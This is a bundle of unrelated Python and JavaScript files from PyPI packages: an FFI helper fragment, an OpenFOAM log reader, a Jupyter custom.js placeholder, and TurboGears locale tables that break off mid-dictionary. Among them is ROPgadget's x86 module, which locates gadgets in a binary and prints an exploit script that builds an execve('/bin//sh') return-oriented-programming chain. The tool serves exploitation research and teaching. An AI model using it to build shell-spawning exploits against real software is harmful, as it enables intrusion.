global _CLASS_PACKED_FUNC
_CLASS_PACKED_FUNC = packed_func_class
def _set_class_object_generic(object_generic_class, func_convert_to_object):
global _CLASS_OBJECT_GENERIC
global _FUNC_CONVERT_TO_OBJECT
_CLASS_OBJECT_GENERIC = object_generic_class
_FUNC_CONVERT_TO_OBJECT = func_convert_to_object | PypiClean |
/ROPGadget-7.4-py3-none-any.whl/ropgadget/ropchain/arch/ropmakerx86.py |
import re
class ROPMakerX86(object):
def __init__(self, binary, gadgets, liboffset=0x0):
self.__binary = binary
self.__gadgets = gadgets
# If it's a library, we have the option to add an offset to the addresses
self.__liboffset = liboffset
self.__generate()
def __lookingForWrite4Where(self, gadgetsAlreadyTested):
for gadget in self.__gadgets:
if gadget in gadgetsAlreadyTested:
continue
f = gadget["gadget"].split(" ; ")[0]
# regex -> mov dword ptr [r32], r32
regex = re.search("mov dword ptr \[(?P<dst>([(eax)|(ebx)|(ecx)|(edx)|(esi)|(edi)]{3}))\], (?P<src>([(eax)|(ebx)|(ecx)|(edx)|(esi)|(edi)]{3}))$", f)
if regex:
lg = gadget["gadget"].split(" ; ")[1:]
try:
for g in lg:
if g.split()[0] != "pop" and g.split()[0] != "ret":
raise
# we need this to filterout 'ret' instructions with an offset like 'ret 0x6', because they ruin the stack pointer
if g != "ret":
if g.split()[0] == "ret" and g.split()[1] != "":
raise
print("\t[+] Gadget found: 0x%x %s" % (gadget["vaddr"], gadget["gadget"]))
return [gadget, regex.group("dst"), regex.group("src")]
except:
continue
return None
def __lookingForSomeThing(self, something):
for gadget in self.__gadgets:
lg = gadget["gadget"].split(" ; ")
if lg[0] == something:
try:
for g in lg[1:]:
if g.split()[0] != "pop" and g.split()[0] != "ret":
raise
# we need this to filterout 'ret' instructions with an offset like 'ret 0x6', because they ruin the stack pointer
if g != "ret":
if g.split()[0] == "ret" and g.split()[1] != "":
raise
print("\t[+] Gadget found: 0x%x %s" % (gadget["vaddr"], gadget["gadget"]))
return gadget
except:
continue
return None
def __padding(self, gadget, regAlreadSetted):
lg = gadget["gadget"].split(" ; ")
for g in lg[1:]:
if g.split()[0] == "pop":
reg = g.split()[1]
try:
print("\tp += pack('<I', 0x%08x) # padding without overwrite %s" % (regAlreadSetted[reg], reg))
except KeyError:
print("\tp += pack('<I', 0x41414141) # padding")
def __buildRopChain(self, write4where, popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall):
sects = self.__binary.getDataSections()
dataAddr = None
for s in sects:
if s["name"] == ".data":
dataAddr = s["vaddr"] + self.__liboffset
if dataAddr is None:
print("\n[-] Error - Can't find a writable section")
return
print("#!/usr/bin/env python3")
print("# execve generated by ROPgadget\n")
print("from struct import pack\n")
print("# Padding goes here")
print("p = b''\n")
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
print("p += b'/bin'")
self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 4" % (dataAddr + 4))
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
print("p += b'//sh'")
self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr + 4}) # Don't overwrite reg dst
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (xorSrc["vaddr"], xorSrc["gadget"]))
self.__padding(xorSrc, {})
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popEbx["vaddr"], popEbx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
self.__padding(popEbx, {})
print("p += pack('<I', 0x%08x) # %s" % (popEcx["vaddr"], popEcx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popEcx, {"ebx": dataAddr}) # Don't overwrite ebx
print("p += pack('<I', 0x%08x) # %s" % (popEdx["vaddr"], popEdx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popEdx, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
print("p += pack('<I', 0x%08x) # %s" % (xorEax["vaddr"], xorEax["gadget"]))
self.__padding(xorEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
for _ in range(11):
print("p += pack('<I', 0x%08x) # %s" % (incEax["vaddr"], incEax["gadget"]))
self.__padding(incEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
print("p += pack('<I', 0x%08x) # %s" % (syscall["vaddr"], syscall["gadget"]))
def __generate(self):
# To find the smaller gadget
self.__gadgets.reverse()
print("\nROP chain generation\n===========================================================")
print("\n- Step 1 -- Write-what-where gadgets\n")
gadgetsAlreadyTested = []
while True:
write4where = self.__lookingForWrite4Where(gadgetsAlreadyTested)
if not write4where:
print("\t[-] Can't find the 'mov dword ptr [r32], r32' gadget")
return
popDst = self.__lookingForSomeThing("pop %s" % write4where[1])
if not popDst:
print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" % write4where[1])
gadgetsAlreadyTested += [write4where[0]]
continue
popSrc = self.__lookingForSomeThing("pop %s" % write4where[2])
if not popSrc:
print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" % write4where[2])
gadgetsAlreadyTested += [write4where[0]]
continue
xorSrc = self.__lookingForSomeThing("xor %s, %s" % (write4where[2], write4where[2]))
if not xorSrc:
print("\t[-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [r], r'\n" % (write4where[2], write4where[2]))
gadgetsAlreadyTested += [write4where[0]]
continue
else:
break
print("\n- Step 2 -- Init syscall number gadgets\n")
xorEax = self.__lookingForSomeThing("xor eax, eax")
if not xorEax:
print("\t[-] Can't find the 'xor eax, eax' instruction")
return
incEax = self.__lookingForSomeThing("inc eax")
if not incEax:
print("\t[-] Can't find the 'inc eax' instruction")
return
print("\n- Step 3 -- Init syscall arguments gadgets\n")
popEbx = self.__lookingForSomeThing("pop ebx")
if not popEbx:
print("\t[-] Can't find the 'pop ebx' instruction")
return
popEcx = self.__lookingForSomeThing("pop ecx")
if not popEcx:
print("\t[-] Can't find the 'pop ecx' instruction")
return
popEdx = self.__lookingForSomeThing("pop edx")
if not popEdx:
print("\t[-] Can't find the 'pop edx' instruction")
return
print("\n- Step 4 -- Syscall gadget\n")
syscall = self.__lookingForSomeThing("int 0x80")
if not syscall:
print("\t[-] Can't find the 'syscall' instruction")
return
print("\n- Step 5 -- Build the ROP chain\n")
self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall) | PypiClean |
/pyFoamd-0.1.0-py3-none-any.whl/pyfoamd/functions/getMonitor.py | from pathlib import Path
import numpy as np
import pyfoamd.types as pt
from pyfoamd import userMsg
import logging
logger = logging.getLogger('pf')
def getMonitor(name=None, startTime='latestTime', dataFileName=None,
logPath=None, workingDir=Path.cwd()):
"""
Get an ofMonitor object from a log file written to the 'postProcessing/'
directory.
Data file is either specified by a `field` and `startTime` argument or a
`logPath`. If `logPath` is specified, the `field` and `time` arguments are
ignored.
Post processing data is typically stored as:
postProcessing/<name>/<startTime>/<dataFile>.dat
Parameters:
name [str]: The field for which data is to be extracted.
startTime [str]: The start time from which to read the log
data. Accepts a string value as either `latestTime` or a numerical
value indicating the start time. If `latestTime` data will be read
from last time in the `field` directory. If 'all' collects data
from all start times available for monitor.
logPath [str]: The path of the log file to read. If specified, the
`field` argument is ignored.
Returns:
data [np.array]: Log file data written as a numpy array
"""
# logging.getLogger('pf').setLevel(logging.DEBUG)
if startTime == 'all':
allTimes = True
else:
allTimes = False
if logPath is None:
if startTime == 'latestTime' or startTime == 'all':
timePath = Path(workingDir) / 'postProcessing' / name
startTime = 0
for time in timePath.iterdir():
try:
time_ = float(time.name)
if time_ > float(startTime):
startTime = time.name
except ValueError:
pass
startTime = str(startTime)
logPathParent = (Path(workingDir) / 'postProcessing' / name
/ str(startTime))
if dataFileName is None:
#TODO: This just takes the first log file in the list. Is there a
# better way?
logFileNames = []
for path in logPathParent.iterdir():
if path.is_file():
logFileNames.append(path.name)
if len(logFileNames) > 1:
userMsg("Found multiple log files, defualting to last item in list: " \
+str(logFileNames), "WARNING"
)
elif len(logFileNames) == 0:
userMsg("Could not find any log file in directory {logPathParent}",
"ERROR")
logPath = logPathParent / logFileNames[-1]
else:
logPath = logPathParent / dataFileName
logger.debug(f"logPath: {logPath}")
monitor = pt.MonitorParser(logPath).makeOFMonitor()
# data = np.loadtxt(logPath, delimiter="\s+")
return monitor | PypiClean |
/dsin100daysv31-6.0.1.tar.gz/dsin100daysv31-6.0.1/notebook/static/custom/custom.js | *
*
* Placeholder for custom user javascript
* mainly to be overridden in profile/static/custom/custom.js
* This will always be an empty file in IPython
*
* User could add any javascript in the `profile/static/custom/custom.js` file.
* It will be executed by the ipython notebook at load time.
*
* Same thing with `profile/static/custom/custom.css` to inject custom css into the notebook.
*
*
* The object available at load time depend on the version of IPython in use.
* there is no guaranties of API stability.
*
* The example below explain the principle, and might not be valid.
*
* Instances are created after the loading of this file and might need to be accessed using events:
* define([
* 'base/js/namespace',
* 'base/js/promises'
* ], function(IPython, promises) {
* promises.app_initialized.then(function (appName) {
* if (appName !== 'NotebookApp') return;
* IPython.keyboard_manager....
* });
* });
*
* __Example 1:__
*
* Create a custom button in toolbar that execute `%qtconsole` in kernel
* and hence open a qtconsole attached to the same kernel as the current notebook
*
* define([
* 'base/js/namespace',
* 'base/js/promises'
* ], function(IPython, promises) {
* promises.app_initialized.then(function (appName) {
* if (appName !== 'NotebookApp') return;
* IPython.toolbar.add_buttons_group([
* {
* 'label' : 'run qtconsole',
* 'icon' : 'icon-terminal', // select your icon from http://fortawesome.github.io/Font-Awesome/icons
* 'callback': function () {
* IPython.notebook.kernel.execute('%qtconsole')
* }
* }
* // add more button here if needed.
* ]);
* });
* });
*
* __Example 2:__
*
* At the completion of the dashboard loading, load an unofficial javascript extension
* that is installed in profile/static/custom/
*
* define([
* 'base/js/events'
* ], function(events) {
* events.on('app_initialized.DashboardApp', function(){
* requirejs(['custom/unofficial_extension.js'])
* });
* });
*
*
*
* @module IPython
* @namespace IPython
* @class customjs
* @static
*/ | PypiClean |
/TurboGears-1.5.1.tar.gz/TurboGears-1.5.1/turbogears/i18n/data/en_PH.py |
languages={'gv': 'Manx', 'gu': 'Gujarati', 'rom': 'Romany', 'alg': 'Algonquian Languages', 'ale': 'Aleut', 'sco': 'Scots', 'mni': 'Manipuri', 'gd': 'Scottish Gaelic', 'ga': 'Irish', 'mno': 'Manobo Languages', 'osa': 'Osage', 'gn': 'Guarani', 'gl': 'Gallegan', 'mwr': 'Marwari', 'ty': 'Tahitian', 'tw': 'Twi', 'tt': 'Tatar', 'tr': 'Turkish', 'ts': 'Tsonga', 'tn': 'Tswana', 'to': 'Tonga (Tonga Islands)', 'aus': 'Australian Languages', 'av': 'Avaric', 'tk': 'Turkmen', 'th': 'Thai', 'roa': 'Romance (Other)', 'tg': 'Tajik', 'te': 'Telugu', 'uga': 'Ugaritic', 'ta': 'Tamil', 'fat': 'Fanti', 'fan': 'Fang', 'wo': 'Wolof', 'rm': 'Rhaeto-Romance', 'din': 'Dinka', 'bla': 'Siksika', 'cmc': 'Chamic Languages', 'ml': 'Malayalam', 'zh': 'Chinese', 'tem': 'Timne', 'za': 'Zhuang', 'cau': 'Caucasian (Other)', 'zu': 'Zulu', 'ter': 'Tereno', 'tet': 'Tetum', 'mnc': 'Manchu', 'kut': 'Kutenai', 'suk': 'Sukuma', 'kum': 'Kumyk', 'sus': 'Susu', 'new': 'Newari', 'sux': 'Sumerian', 'den': 'Slave', 'men': 'Mende', 'mul': 'Multiple Languages', 'lez': 'Lezghian', 'root': 'Root', 'eka': 'Ekajuk', 'akk': 'Akkadian', 'dra': 'Dravidian (Other)', 'jrb': 'Judeo-Arabic', 'sgn': 'Sign Languages', 'sga': 'Irish, Old (to 900)', 'apa': 'Apache Languages', 'bra': 'Braj', 'chb': 'Chibcha', 'chg': 'Chagatai', 'chk': 'Chuukese', 'chm': 'Mari', 'chn': 'Chinook Jargon', 'cho': 'Choctaw', 'chp': 'Chipewyan', 'chr': 'Cherokee', 'chy': 'Cheyenne', 'ti': 'Tigrinya', 'vot': 'Votic', 'mg': 'Malagasy', 'iba': 'Iban', 'mo': 'Moldavian', 'mn': 'Mongolian', 'mi': 'Maori', 'mh': 'Marshallese', 'mk': 'Macedonian', 'mt': 'Maltese', 'cai': 'Central American Indian (Other)', 'del': 'Delaware', 'ms': 'Malay', 'mr': 'Marathi', 'my': 'Burmese', 'cad': 'Caddo', 'tai': 'Tai (Other)', 'afh': 'Afrihili', 'sit': 'Sino-Tibetan (Other)', 'enm': 'English, Middle (1100-1500)', 'csb': 'Kashubian', 'nyn': 'Nyankole', 'nyo': 'Nyoro', 'nym': 'Nyamwezi', 'sio': 'Siouan Languages', 'map': 'Austronesian', 'mas': 'Masai', 'lah': 'Lahnda', 'lad': 'Ladino', 'fy': 'Frisian', 'snk': 'Soninke', 'fa': 'Persian', 'mad': 'Madurese', 'mag': 'Magahi', 'mai': 'Maithili', 'fi': 'Finnish', 'fj': 'Fijian', 'man': 'Mandingo', 'egy': 'Egyptian (Ancient)', 'znd': 'Zande', 'ss': 'Swati', 'sr': 'Serbian', 'sq': 'Albanian', 'sw': 'Swahili', 'sv': 'Swedish', 'su': 'Sundanese', 'st': 'Sotho, Southern', 'sk': 'Slovak', 'si': 'Sinhalese', 'sh': 'Serbo-Croatian', 'so': 'Somali', 'sn': 'Shona', 'sm': 'Samoan', 'sl': 'Slovenian', 'sc': 'Sardinian', 'sa': 'Sanskrit', 'sg': 'Sango', 'se': 'Northern Sami', 'sd': 'Sindhi', 'zen': 'Zenaga', 'kbd': 'Kabardian', 'afa': 'Afro-Asiatic (Other)', 'lg': 'Ganda', 'lb': 'Luxembourgish', 'fiu': 'Finno - Ugrian (Other)', 'ln': 'Lingala', 'lo': 'Lao', 'li': 'Limburgish', 'byn': 'Blin', 'lt': 'Lithuanian', 'lu': 'Luba-Katanga', 'yi': 'Yiddish', 'non': 'Norse, Old', 'ceb': 'Cebuano', 'yo': 'Yoruba', 'nog': 'Nogai', 'bat': 'Baltic (Other)', 'dak': 'Dakota', 'dar': 'Dargwa', 'day': 'Dayak', 'ssa': 'Nilo-Saharam (Other)', 'kpe': 'Kpelle', 'el': 'Greek', 'eo': 'Esperanto', 'en': 'English', 'lam': 'Lamba', 'ee': 'Ewe', 'mdf': 'Moksha', 'fr': 'French', 'mdr': 'Mandar', 'et': 'Estonian', 'es': 'Spanish', 'ru': 'Russian', 'gon': 'Gondi', 'goh': 'German, Old High (ca.750-1050)', 'sms': 'Skolt Sami', 'smn': 'Inari Sami', 'smj': 'Lule Sami', 'smi': 'Sami languages (Other)', 'got': 'Gothic', 'rn': 'Rundi', 'ro': 'Romanian', 'dsb': 'Lower Sorbian', 'sma': 'Southern Sami', 'gor': 'Gorontalo', 'ast': 'Asturian', 'wal': 'Walamo', 'crh': 'Crimean Turkish; Crimean Tatar', 'ath': 'Athapascan Languages', 'gez': 'Geez', 'xh': 'Xhosa', 'ff': 'Fulah', 'mak': 'Makasar', 'zap': 'Zapotec', 'kok': 'Konkani', 'kos': 'Kosraean', 'fo': 'Faroese', 'tog': 'Tonga (Nyasa)', 'hup': 'Hupa', 'udm': 'Udmurt', 'bej': 'Beja', 'bem': 'Bemba', 'tsi': 'Tsimshian', 'ber': 'Berber', 'nzi': 'Nzima', 'sai': 'South American Indian (Other)', 'ang': 'English, Old (ca.450-1100)', 'pra': 'Prakrit Languages', 'bho': 'Bhojpuri', 'sal': 'Salishan languages', 'pro': u'Proven\xe7al, Old (to 1500)', 'raj': 'Rajasthani', 'sad': 'Sandawe', 'rar': 'Rarotongan', 'rap': 'Rapanui', 'sas': 'Sasak', 'car': 'Carib', 'min': 'Minangkabau', 'mic': 'Micmac', 'efi': 'Efik', 'arn': 'Araucanian', 'ypk': 'Yupik Languages', 'mis': 'Miscellaneous Languages', 'kac': 'Kachin', 'kab': 'Kabyle', 'kaa': 'Kara-Kalpak', 'kam': 'Kamba', 'kar': 'Karen', 'kaw': 'Kawi', 'tyv': 'Tuvinian', 'awa': 'Awadhi', 'ka': 'Georgian', 'doi': 'Dogri', 'kg': 'Kongo', 'kk': 'Kazakh', 'kj': 'Kuanyama', 'ki': 'Kikuyu', 'ko': 'Korean', 'kn': 'Kannada', 'km': 'Khmer', 'kl': 'Kalaallisut', 'ks': 'Kashmiri', 'kr': 'Kanuri', 'kw': 'Cornish', 'kv': 'Komi', 'ku': 'Kurdish', 'ky': 'Kirghiz', 'tkl': 'Tokelau', 'bua': 'Buriat', 'mga': 'Irish, Middle (900-1200)', 'hit': 'Hittite', 'dyu': 'Dyula', 'de': 'German', 'da': 'Danish', 'dz': 'Dzongkha', 'ira': 'Iranian', 'dv': 'Divehi', 'hil': 'Hiligaynon', 'him': 'Himachali', 'gem': 'Germanic (Other)', 'crp': 'Creoles and Pidgins (Other)', 'qu': 'Quechua', 'bas': 'Basa', 'gba': 'Gbaya', 'bad': 'Banda', 'ban': 'Balinese', 'bal': 'Baluchi', 'bam': 'Bambara', 'shn': 'Shan', 'bai': 'Bamileke Languages', 'arp': 'Arapaho', 'art': 'Artificial (Other)', 'arw': 'Arawak', 'arc': 'Aramaic', 'sem': 'Semitic (Other)', 'sel': 'Selkup', 'nub': 'Nubian Languages', 'btk': 'Batak', 'lus': 'Lushai', 'mus': 'Creek', 'lua': 'Luba-Lulua', 'iro': 'Iroquoian languages', 'lui': 'Luiseno', 'mun': 'Munda Languages', 'lun': 'Lunda', 'luo': 'Luo', 'wa': 'Walloon', 'tup': 'Tupi languages', 'jv': 'Javanese', 'tut': 'Altaic (Other)', 'tum': 'Tumbuka', 'ja': 'Japanese', 'cop': 'Coptic', 'ilo': 'Iloko', 'la': 'Latin', 'gwi': "Gwich'in", 'und': 'Undetermined', 'tli': 'Tlingit', 'ch': 'Chamorro', 'co': 'Corsican', 'ca': 'Catalan', 'ce': 'Chechen', 'pon': 'Pohnpeian', 'cy': 'Welsh', 'sah': 'Yakut', 'cs': 'Czech', 'cr': 'Cree', 'bnt': 'Bantu', 'cv': 'Chuvash', 'cu': 'Church Slavic', 'lv': 'Latvian', 'dum': 'Dutch, Middle (ca. 1050-1350)', 'pt': 'Portuguese', 'dua': 'Duala', 'fro': 'French, Old (842-ca.1400)', 'yap': 'Yapese', 'frm': 'French, Middle (ca.1400-1600)', 'tiv': 'Tiv', 'yao': 'Yao', 'pa': 'Punjabi', 'xal': 'Kalmyk', 'pi': 'Pali', 'pl': 'Polish', 'gay': 'Gayo', 'oto': 'Otomian Languages', 'ota': 'Turkish, Ottoman (1500-1928)', 'hmn': 'Hmong', 'an': 'Aragonese', 'gaa': 'Ga', 'fur': 'Friulian', 'khi': 'Khoisan (Other)', 'sla': 'Slavic (Other)', 've': 'Venda', 'vi': 'Vietnamese', 'is': 'Icelandic', 'kho': 'Khotanese', 'iu': 'Inuktitut', 'it': 'Italian', 'vo': u'Volap\xfck', 'ii': 'Sichuan Yi', 'ik': 'Inupiaq', 'io': 'Ido', 'ine': 'Indo-European (Other)', 'ia': 'Interlingua', 'jpr': 'Judeo-Persian', 'ie': 'Interlingue', 'id': 'Indonesian', 'ig': 'Igbo', 'pap': 'Papiamento', 'ewo': 'Ewondo', 'pau': 'Palauan', 'paa': 'Papuan (Other)', 'pag': 'Pangasinan', 'sat': 'Santali', 'pal': 'Pahlavi', 'pam': 'Pampanga', 'phi': 'Philippine (Other)', 'cel': 'Celtic (Other)', 'phn': 'Phoenician', 'nic': 'Niger - Kordofanian (Other)', 'nia': 'Nias', 'dgr': 'Dogrib', 'syr': 'Syriac', 'niu': 'Niuean', 'jbo': 'Lojban', 'nah': 'Nahuatl', 'sam': 'Samaritan Aramaic', 'hai': 'Haida', 'gmh': 'German, Middle High (ca.1050-1500)', 'cus': 'Cushitic (Other)', 'wen': 'Sorbian Languages', 'ady': 'Adyghe', 'elx': 'Elamite', 'ada': 'Adangme', 'haw': 'Hawaiian', 'bin': 'Bini', 'bik': 'Bikol', 'mos': 'Mossi', 'moh': 'Mohawk', 'tl': 'Tagalog', 'tvl': 'Tuvalu', 'ijo': 'Ijo', 'kmb': 'Kimbundu', 'peo': 'Persian Old (ca.600-400 B.C.)', 'umb': 'Umbundu', 'tmh': 'Tamashek', 'fon': 'Fon', 'hsb': 'Upper Sorbian', 'be': 'Belarusian', 'bg': 'Bulgarian', 'ba': 'Bashkir', 'ps': 'Pashto (Pushto)', 'bm': 'Bambara', 'bn': 'Bengali', 'bo': 'Tibetan', 'bh': 'Bihari', 'bi': 'Bislama', 'br': 'Breton', 'bs': 'Bosnian', 'om': 'Oromo', 'oj': 'Ojibwa', 'ace': 'Achinese', 'ach': 'Acoli', 'oc': u'Occitan (post 1500); Proven\xe7al', 'kru': 'Kurukh', 'srr': 'Serer', 'kro': 'Kru', 'krc': 'Karachay-Balkar', 'nds': 'Low German; Low Saxon', 'os': 'Ossetic', 'or': 'Oriya', 'sog': 'Sogdien', 'nso': 'Sotho, Northern', 'son': 'Songhai', 'vai': 'Vai', 'wak': 'Wakashan Languages', 'lol': 'Mongo', 'mkh': 'Mon-Khmer (Other)', 'loz': 'Lozi', 'gil': 'Gilbertese', 'was': 'Washo', 'war': 'Waray', 'hz': 'Herero', 'hy': 'Armenian', 'sid': 'Sidamo', 'hr': 'Croatian', 'ht': 'Haitian', 'hu': 'Hungarian', 'hi': 'Hindi', 'ho': 'Hiri Motu', 'ha': 'Hausa', 'bug': 'Buginese', 'he': 'Hebrew', 'uz': 'Uzbek', 'ur': 'Urdu', 'uk': 'Ukrainian', 'ug': 'Uighur', 'aa': 'Afar', 'ab': 'Abkhazian', 'ae': 'Avestan', 'af': 'Afrikaans', 'ak': 'Akan', 'am': 'Amharic', 'myv': 'Erzya', 'eu': 'Basque', 'as': 'Assamese', 'ar': 'Arabic', 'inh': 'Ingush', 'tpi': 'Tok Pisin', 'myn': 'Mayan', 'ay': 'Aymara', 'kha': 'Khasi', 'az': 'Azerbaijani', 'inc': 'Indic (Other)', 'nl': 'Dutch', 'nn': 'Norwegian Nynorsk', 'no': 'Norwegian', 'na': 'Nauru', 'nb': u'Norwegian Bokm\xe5l', 'nai': 'North American Indian (Other)', 'nd': 'Ndebele, North', 'ne': 'Nepali', 'ng': 'Ndonga', 'ny': 'Nyanja; Chichewa; Chewa', 'nap': 'Neapolitan', 'grb': 'Gerbo', 'grc': 'Greek, Ancient (to 1453)', 'nr': 'Ndebele, South', 'tig': 'Tigre', 'nv': 'Navajo', 'zun': 'Zuni', 'rw': 'Kinyarwanda', 'cpe': 'Creoles and Pidgins, English-based (Other)', 'cpf': 'Creoles and Pidgins, French-based (Other)', 'cpp': 'Creoles and pidgins, Portuguese-based (Other)'}
countries={'BD': 'Bangladesh', 'BE': 'Belgium', 'BF': 'Burkina Faso', 'BG': 'Bulgaria', 'BA': 'Bosnia and Herzegovina', 'BB': 'Barbados', 'WF': 'Wallis and Futuna', 'BM': 'Bermuda', 'BN': 'Brunei', 'BO': 'Bolivia', 'BH': 'Bahrain', 'BI': 'Burundi', 'BJ': 'Benin', 'BT': 'Bhutan', 'JM': 'Jamaica', 'BV': 'Bouvet Island', 'BW': 'Botswana', 'WS': 'Samoa', 'BR': 'Brazil', 'BS': 'Bahamas', 'BY': 'Belarus', 'BZ': 'Belize', 'RU': 'Russia', 'RW': 'Rwanda', 'TL': 'Timor-Leste', 'RE': u'R\xe9union', 'TM': 'Turkmenistan', 'TJ': 'Tajikistan', 'RO': 'Romania', 'TK': 'Tokelau', 'GW': 'Guinea-Bissau', 'GU': 'Guam', 'GT': 'Guatemala', 'GS': 'South Georgia and South Sandwich Islands', 'GR': 'Greece', 'GQ': 'Equatorial Guinea', 'GP': 'Guadeloupe', 'JP': 'Japan', 'GY': 'Guyana', 'GF': 'French Guiana', 'GE': 'Georgia', 'GD': 'Grenada', 'GB': 'United Kingdom', 'GA': 'Gabon', 'SV': 'El Salvador', 'GN': 'Guinea', 'GM': 'Gambia', 'GL': 'Greenland', 'GI': 'Gibraltar', 'GH': 'Ghana', 'OM': 'Oman', 'TN': 'Tunisia', 'JO': 'Jordan', 'SP': 'Serbia', 'HR': 'Croatia', 'HT': 'Haiti', 'HU': 'Hungary', 'HK': 'Hong Kong S.A.R., China', 'HN': 'Honduras', 'HM': 'Heard Island and McDonald Islands', 'VE': 'Venezuela', 'PR': 'Puerto Rico', 'PS': 'Palestinian Territory', 'PW': 'Palau', 'PT': 'Portugal', 'SJ': 'Svalbard and Jan Mayen', 'PY': 'Paraguay', 'IQ': 'Iraq', 'PA': 'Panama', 'PF': 'French Polynesia', 'PG': 'Papua New Guinea', 'PE': 'Peru', 'PK': 'Pakistan', 'PH': 'Philippines', 'PN': 'Pitcairn', 'PL': 'Poland', 'PM': 'Saint Pierre and Miquelon', 'ZM': 'Zambia', 'EH': 'Western Sahara', 'EE': 'Estonia', 'EG': 'Egypt', 'ZA': 'South Africa', 'EC': 'Ecuador', 'IT': 'Italy', 'VN': 'Vietnam', 'SB': 'Solomon Islands', 'ET': 'Ethiopia', 'SO': 'Somalia', 'ZW': 'Zimbabwe', 'SA': 'Saudi Arabia', 'ES': 'Spain', 'ER': 'Eritrea', 'MD': 'Moldova', 'MG': 'Madagascar', 'MA': 'Morocco', 'MC': 'Monaco', 'UZ': 'Uzbekistan', 'MM': 'Myanmar', 'ML': 'Mali', 'MO': 'Macao S.A.R. China', 'MN': 'Mongolia', 'MH': 'Marshall Islands', 'MK': 'Macedonia', 'MU': 'Mauritius', 'MT': 'Malta', 'MW': 'Malawi', 'MV': 'Maldives', 'MQ': 'Martinique', 'MP': 'Northern Mariana Islands', 'MS': 'Montserrat', 'MR': 'Mauritania', 'UG': 'Uganda', 'MY': 'Malaysia', 'MX': 'Mexico', 'IL': 'Israel', 'FR': 'France', 'IO': 'British Indian Ocean Territory', 'SH': 'Saint Helena', 'FI': 'Finland', 'FJ': 'Fiji', 'FK': 'Falkland Islands', 'FM': 'Micronesia', 'FO': 'Faroe Islands', 'NI': 'Nicaragua', 'NL': 'Netherlands', 'NO': 'Norway', 'NA': 'Namibia', 'VU': 'Vanuatu', 'NC': 'New Caledonia', 'NE': 'Niger', 'NF': 'Norfolk Island', 'NG': 'Nigeria', 'NZ': 'New Zealand', 'NP': 'Nepal', 'NR': 'Nauru', 'NU': 'Niue', 'CK': 'Cook Islands', 'CI': u"C\xf4te d'Ivoire", 'CH': 'Switzerland', 'CO': 'Colombia', 'CN': 'China', 'CM': 'Cameroon', 'CL': 'Chile', 'CC': 'Cocos Islands', 'CA': 'Canada', 'CG': 'Congo', 'CF': 'Central African Republic', 'CD': 'Democratic Republic of the Congo', 'CZ': 'Czech Republic', 'CY': 'Cyprus', 'CX': 'Christmas Island', 'CR': 'Costa Rica', 'CV': 'Cape Verde', 'CU': 'Cuba', 'SZ': 'Swaziland', 'SY': 'Syria', 'KG': 'Kyrgyzstan', 'KE': 'Kenya', 'SR': 'Suriname', 'KI': 'Kiribati', 'KH': 'Cambodia', 'KN': 'Saint Kitts and Nevis', 'KM': 'Comoros', 'ST': 'Sao Tome and Principe', 'SK': 'Slovakia', 'KR': 'South Korea', 'SI': 'Slovenia', 'KP': 'North Korea', 'KW': 'Kuwait', 'SN': 'Senegal', 'SM': 'San Marino', 'SL': 'Sierra Leone', 'SC': 'Seychelles', 'KZ': 'Kazakhstan', 'KY': 'Cayman Islands', 'SG': 'Singapore', 'SE': 'Sweden', 'SD': 'Sudan', 'DO': 'Dominican Republic', 'DM': 'Dominica', 'DJ': 'Djibouti', 'DK': 'Denmark', 'VG': 'British Virgin Islands', 'DE': 'Germany', 'YE': 'Yemen', 'DZ': 'Algeria', 'US': 'United States', 'UY': 'Uruguay', 'YU': 'Yugoslavia', 'YT': 'Mayotte', 'UM': 'United States Minor Outlying Islands', 'LB': 'Lebanon', 'LC': 'Saint Lucia', 'LA': 'Laos', 'TV': 'Tuvalu', 'TW': 'Taiwan', 'TT': 'Trinidad and Tobago', 'TR': 'Turkey', 'LK': 'Sri Lanka', 'LI': 'Liechtenstein', 'LV': 'Latvia', 'TO': 'Tonga', 'LT': 'Lithuania', 'LU': 'Luxembourg', 'LR': 'Liberia', 'LS': 'Lesotho', 'TH': 'Thailand', 'TF': 'French Southern Territories', 'TG': 'Togo', 'TD': 'Chad', 'TC': 'Turks and Caicos Islands', 'LY': 'Libya', 'VA': 'Vatican', 'VC': 'Saint Vincent and the Grenadines', 'AE': 'United Arab Emirates', 'AD': 'Andorra', 'AG': 'Antigua and Barbuda', 'AF': 'Afghanistan', 'AI': 'Anguilla', 'VI': 'U.S. Virgin Islands', 'IS': 'Iceland', 'IR': 'Iran', 'AM': 'Armenia', 'AL': 'Albania', 'AO': 